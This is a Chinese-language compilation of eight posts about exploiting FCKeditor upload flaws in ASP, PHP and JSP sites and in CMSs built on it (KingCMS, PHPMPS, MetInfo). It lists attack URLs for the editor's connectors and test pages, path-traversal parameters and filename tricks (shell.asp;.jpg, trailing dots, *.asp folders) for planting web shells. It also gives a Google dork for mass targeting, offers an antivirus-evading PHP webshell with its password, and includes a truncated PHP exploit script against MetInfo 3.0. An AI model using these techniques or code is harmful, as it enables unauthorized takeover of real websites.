fckeditor漏洞利用

| 收藏本文 下载本文 作者:不语

以下是小编帮大家整理的fckeditor漏洞利用(共含8篇),仅供参考,欢迎大家阅读。同时,但愿您也能像本文投稿人“不语”一样,积极向本站投稿分享好文章。

fckeditor漏洞利用

篇1:fckeditor漏洞利用

网络

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马,利用路径解析漏洞,也可以直接上传ASP木马,

fckeditor漏洞利用

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如:

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

篇2:fckeditor漏洞利用漏洞预警

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马,

fckeditor漏洞利用漏洞预警

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如:

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

篇3:FCKeditor漏洞利用总结漏洞预警

Fckeditor漏洞利用总结

查看编辑器版本

FCKeditor/_whatsnew.html

—————————————————————————————————————————————————————————————

2. Version 2.2 版本

Apache+linux 环境下在上传文件后面加个.突破!测试通过,

—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。

action=“www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=“post”>Upload a new file:

—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法

很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。

4.1:提交shell.php+空格绕过

不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。

4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。

—————————————————————————————————————————————————————————————

5. 突破建立文件夹

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

—————————————————————————————————————————————————————————————

7.常用上传地址

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)

JSP 版:

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文

件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址,

—————————————————————————————————————————————————————————————

8.其他上传地址

FCKeditor/_samples/default.html

FCKeditor/_samples/asp/sample01.asp

FCKeditor/_samples/asp/sample02.asp

FCKeditor/_samples/asp/sample03.asp

FCKeditor/_samples/asp/sample04.asp

一般很多站点都已删除_samples 目录,可以试试。

FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。

—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址

Version 2.4.1 测试通过

修改CurrentFolder 参数使用 ../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

也可以直接浏览盘符:

JSP 版本:

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

—————————————————————————————————————————————————————————————

10.爆路径漏洞

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题

影响版本: FCKeditor x.x <= FCKeditor v2.4.3

脆弱描述:

FCKeditor v2.4.3 中File 类别默认拒绝上传类型:

html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!

而在apache 下,因为“Apache 文件名解析缺陷漏洞”也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。

在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!

篇4:kingcms 5.0 fckeditor 漏洞

影响版本:5.0

漏洞描述:

小新研究咋拿shell 一起看了下..结合了fckeditor的cms,认真看过我blog的人 现在也都应该熟悉了那几种方法了

直接讲利用吧...

又是本地构造咯...代码前面文章有...就不贴了..

kingcms 5.0 fckeditor 路径在 admin/system/editor/fckeditor/

把本地的马命名为 hx.asp;jpg 注意看 jpg前面没有点了..

OK了..其实以后做站结合fckeditor这类的编辑器..最好加个验证..只有管理才能访问..这样或者比较好吧

精简掉也不错..其实改下后台地址就可以避免了

篇5:fckeditor漏洞,通杀PHPMPS

保留:邪恶十进制 bbs.evilten.com/

网址加上 /includefckeditoreditorfilemanagerconnectorstest.html

connectors选择php,上传英文名称的php或asp马得shell,很是简单。

上传的马一般不改名,遇同名马则改成数组式,故建议不要用中文名。

马的路径直接在下方空白处查看路径。一般路径是/data/upload/file/你的马。

=======================

批量方法;Google:Powered by Phpmps

------------------------------------------------------------------------------------------------------------------------------

送免杀PHP大马一只,

密码 qingshu

-----------------------------------------------------------------------------------------------------------------------------

根据本人了解前几天NOD32杀软官方被黑,还有微软在其他几个国家的分站被黑,都是因为FCK漏洞被黑的。只是大家没有重视.以下是一个FCK本地上传工具!

只要发现了FCK漏洞,使用本地上传漏洞工具都是可以通杀的!

篇6:MetInfo 3.0 (fckeditor)上传漏洞漏洞预警

MetInfo企业网站管理系统是采用PHP+MYSQL构架的,其中采用了FCKeditor在线编辑器配置不当导致上传被利用,在某些情况下上传1.php.pdf可获取网站shell,

Exploit:

guideshen.blogspot.com- @Guide_Shen -xsstorm.blogspot.com*/   error_reporting(0);    set_time_limit(0);    ini_set(“default_socket_timeout”, 5);    function http_send($host, $packet)    {     $sock = fsockopen($host, 80);     while (!$sock)     {      print “n[-] No response from {$host}:80 Trying again...”;      $sock = fsockopen($host, 80);     }     fputs($sock, $packet);     while (!feof($sock)) $resp .= fread($sock, 1024);     fclose($sock);     return $resp;    }    print “n+------------------------------------------------------------+”;    print “n       MetInfo 3.0 File Upload (fckeditor) sh3n           ”;    print “n+------------------------------------------------------------+n”;    if ($argc < 2)    {     print “nUsage......: php $argv[0] metinfo.pe path”;     print “nExample....: php $argv[0] localhost /fckeditor/n”;     die;    }    $host = $argv[1];    $path = $argv[2];    $data = “--xSsT0rmrn”;    $data .= “Content-Disposition: form-data; name=”NewFile“; filename=”sh3n.php.pdf“rn”;    $data .= “Content-Type: application/octet-streamrnrn”;    $data .= "

篇7:fckeditor 2.63 0day漏洞漏洞预警

首先,说一下,这个可以说是fckeditor 2.63 oday 。目前知道的人比较多了。

xxxx.com/fckeditor/editor/filemanager/connectors/test.html

hbkingco.com//fckeditor/editor/filemanager/connectors/uploadtest.html 这个两个页面,是死的关键,

上传xx.asa;.jpg

上传之后,路径自然出来了。马为xx.asa; 注意,后面有个;

除了2.63.

Fckeditor 基本上每个版本都可以这么利用。

上传不严格。。

也可以说是IIS G6.0的漏洞。

篇8:新突破fckeditor漏洞漏洞预警

经测试,此方法通杀asp、aspx版本,不适用于php,

之前很多的方法,诸如上传*.asp等类型文件;创建*.asp等目录……

今天遇到一个fck编辑器,跟之前很多次一样,以上方法均无果。

创建*.asp;*.php等目录无果;上传*.asp;.jpg等文件无果;神马cer之类的就不说了,

以下是误打误撞的方法,不知道黑扩们发了没。

利用过程:

1、Current Folder处填写*.asp等目录文件,随便填即可;点击Create Folder创建目录;目录名随便填。

2、上传jpg格式的一句话木马。

3、利用完毕,直接访问一句话木马地址即可,菜刀链接。

FCKeditor漏洞利用总结漏洞预警

cfm本地包含漏洞利用

ECSHOP的flow页注入利用方法&EXP漏洞预警

一个dedecms变量覆盖漏洞的猥琐利用方法漏洞预警

小榕的WIS漏洞补充篇及利用篇脚本安全

udev漏洞提升

漏洞整改报告

规章制度执行有漏洞

心灵的漏洞作文

利用IT创新企业管理

fckeditor漏洞利用(共8篇)

欢迎下载DOC格式的fckeditor漏洞利用,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档